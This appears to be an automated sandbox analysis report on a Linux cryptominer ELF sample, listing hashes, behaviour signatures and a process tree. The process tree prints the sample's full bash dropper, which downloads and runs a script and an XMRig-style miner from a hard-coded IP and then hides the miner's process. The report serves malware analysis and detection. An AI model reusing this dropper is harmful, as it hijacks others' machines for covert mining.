Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    18/10/2024, 01:38

General

  • Target

    481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf

  • Size

    15KB

  • MD5

    aee014a523b65c8d3b7bdb92765d305c

  • SHA1

    dfb9d0cada5cf03c3dfa4479865955311e6a54f9

  • SHA256

    481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282

  • SHA512

    4b9d43d58bd6ff61dc563d55dea121f94040ab24137154f2dfe03b342c8ae96676ca438302ff7d63b68d4e34bb8bcdd94909cb56002d3feef73820ca8b3969d8

  • SSDEEP

    384:Zr+Ken0Xvn/3PHfXvn/3PHfayqC6UNwA42KW9XxqZeMm:s90Xvn/3PHfXvn/3PHfayqC6U+6XxqgR

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 46 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 27 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
    /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
    1⤵
      PID:1604
    • /bin/bash
      /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c "exec '/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf' \"\$@\"" /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
      1⤵
        PID:1604
      • /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
        /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
        1⤵
          PID:1604
        • /bin/bash
          /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c " #!/bin/bash cpu_num=`grep -c \"model name\" /proc/cpuinfo` cpu_used=`expr \$cpu_num / 2` #echo \$s dir=\$(pwd) if [ `whoami` = \"root\" ];then cd ~ && mkdir .sysemd >/dev/null 2>&1 cd .sysemd >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 n=\$(cat .num) kill -9 \$n >/dev/null 2>&1 curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh && chmod +x go.sh sleep 1 sed -i \"3s/20/\${cpu_used}/\" go.sh curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd && chmod +x sysemd sleep 1 sh go.sh sleep 3 pid=\$(top -b -n1 | grep sysemd | head -1 | awk '{print \$1}') echo \$pid > .num mount -o bind /tmp /proc/\$pid >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 fi " /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
          1⤵
          • File and Directory Permissions Modification
          PID:1604
          • /usr/bin/grep
            grep -c "model name" /proc/cpuinfo
            2⤵
            • Checks CPU configuration
            PID:1605
          • /usr/bin/expr
            expr 1 / 2
            2⤵
              PID:1606
            • /usr/bin/whoami
              whoami
              2⤵
                PID:1608
              • /usr/bin/mkdir
                mkdir .sysemd
                2⤵
                  PID:1609
                • /usr/bin/rm
                  rm -f go.sh sysemd
                  2⤵
                    PID:1610
                  • /usr/bin/cat
                    cat .num
                    2⤵
                      PID:1611
                    • /usr/bin/curl
                      curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh
                      2⤵
                        PID:1612
                      • /usr/bin/chmod
                        chmod +x go.sh
                        2⤵
                        • File and Directory Permissions Modification
                        PID:1616
                      • /usr/bin/sleep
                        sleep 1
                        2⤵
                          PID:1617
                        • /usr/bin/sed
                          sed -i 3s/20/0/ go.sh
                          2⤵
                            PID:1618
                          • /usr/bin/curl
                            curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd
                            2⤵
                              PID:1619
                            • /usr/bin/chmod
                              chmod +x sysemd
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1628
                            • /usr/bin/sleep
                              sleep 1
                              2⤵
                                PID:1629
                              • /usr/bin/sh
                                sh go.sh
                                2⤵
                                  PID:1630
                                  • /root/.sysemd/sysemd
                                    ./sysemd -o 104.168.101.23:34512 -t 0 -p xm3 --randomx-1gb-pages -k -B
                                    3⤵
                                    • Executes dropped EXE
                                    • Checks hardware identifiers (DMI)
                                    • Reads hardware information
                                    • Checks CPU configuration
                                    • Reads CPU attributes
                                    • Enumerates kernel/hardware configuration
                                    PID:1631
                                • /usr/bin/sleep
                                  sleep 3
                                  2⤵
                                    PID:1633
                                  • /usr/bin/grep
                                    grep sysemd
                                    2⤵
                                      PID:1642
                                    • /usr/bin/top
                                      top -b -n1
                                      2⤵
                                      • Reads CPU attributes
                                      • Enumerates kernel/hardware configuration
                                      • Reads runtime system information
                                      PID:1641
                                    • /usr/bin/head
                                      head -1
                                      2⤵
                                        PID:1643
                                      • /usr/bin/awk
                                        awk "{print \$1}"
                                        2⤵
                                          PID:1644
                                        • /usr/bin/mount
                                          mount -o bind /tmp /proc/1632
                                          2⤵
                                            PID:1645
                                          • /usr/bin/rm
                                            rm -f go.sh sysemd
                                            2⤵
                                              PID:1647

                                          Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • /root/.sysemd/.num

                                                  Filesize

                                                  5B

                                                  MD5

                                                  679359fe74d809a6564f60e75585ed3b

                                                  SHA1

                                                  7f114e9dc091154c365576d4702a63392f88704e

                                                  SHA256

                                                  d05dd95f7ec068988015cb6c4536510191eaba0ebbd7a6c9feb55c73650cc698

                                                  SHA512

                                                  9b493b0a9a67bcb95df947fc628ab7366ed6f5136267782dc0c967063244b5e4acacc32a22242b8fc506f22cdfe91eb802165e4c7d12e07de79563453f3e05a7

                                                • /root/.sysemd/go.sh

                                                  Filesize

                                                  87B

                                                  MD5

                                                  496b34eb065a5f2a4b2455f207d890b2

                                                  SHA1

                                                  dc170fb3d571ef0b238e33fcae8c2bc50e1e4fd1

                                                  SHA256

                                                  728055874a80558d3900fded78c97584d4728e1bd9124db9d20b8953edacb8c4

                                                  SHA512

                                                  f9774855d64f46b232f93601430db18bd470067372a09c3933d19ca19658eb21d9c6d4f4d1ef49a7e1d0526e6f67d40d9e33e54c8f0867050c0d348635b19e47

                                                • /root/.sysemd/sedK5Ug6t

                                                  Filesize

                                                  86B

                                                  MD5

                                                  6bcf2d2ea1ceb1766c5bfbf8728a57e3

                                                  SHA1

                                                  e542eee55d92c4f5e3fbb86c244edf04afdfee22

                                                  SHA256

                                                  53bff9f21bdaa669c662f3d9c3a4d7f236e063f75ce418874d55674ea6125796

                                                  SHA512

                                                  00d0dd6643a22d7e63a559a5dd7f48cd61f26a5c214e308fbd3dcb6a1238d553f89f7af51a92465004b117b9cd08c1df2c2e46875f5a8f61ed467dc87cd9b598

                                                • /root/.sysemd/sysemd

                                                  Filesize

                                                  6.7MB

                                                  MD5

                                                  8f633ade35df4f992eb28a2c5bc37cef

                                                  SHA1

                                                  6b2fe529339896b22328dec8936219e7b8e3252f

                                                  SHA256

                                                  364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c

                                                  SHA512

                                                  8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73